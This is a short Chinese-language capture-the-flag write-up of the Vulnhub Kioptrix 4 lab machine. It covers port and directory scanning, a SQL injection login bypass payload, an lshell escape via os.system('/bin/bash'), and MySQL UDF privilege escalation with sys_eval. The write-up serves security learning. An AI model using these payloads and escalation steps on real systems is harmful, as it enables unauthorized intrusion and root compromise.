Vulnhub-Kioptrix-4

摸鱼.

信息收集

NMAP

1
rustscan -a 10.1.1.11 -- -sC -sV

image-20220419153000859

SAMBA

image-20220419154808057

HTTP

1
feroxbuster -u 'http://10.1.1.11/' -r -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt  -a "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36"  -n -k

image-20220419153441469

访问就一个登录页面,尝试注入

image-20220419154042463

image-20220419153900682

万能密码

1
2
3
4
5
john
1' or 1=1 --+

robert
1' or 1=1 --+

image-20220419153825085

一开始扫目录设置错了不知道用户名,还自己去手注了。简直SB

image-20220419154213644

Lshell逃逸

登录进来发现是个受限的shell

image-20220419154500768

尝试了一些rbash逃逸的方法,但是哒咩。

经过一些测试,发现ls啥的还是gnu版本的,并不是这个shell带的版本的,感觉还是有别的方法进去。用拿到的凭据登录samba,但是也是没线索。

image-20220419155038219

最后使用help命令时发现关键字lshell,经过搜索:https://www.aldeid.com/wiki/Lshell

image-20220419155130854

1
echo os.system('/bin/bash')

image-20220419155317700

直接丢linpeas

image-20220419155359105

mysql root 密码为空

image-20220419155443608

提权

直接udf提权

1
2
3
use members;
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys.so';
sys_eval('whoami')

image-20220419155514195

image-20220419155736728

总结

打下来觉得是个简单难度的靶机。

学习点主要有以下

  • SQL注入
  • Mysql UDF提权
  • Lshell 逃逸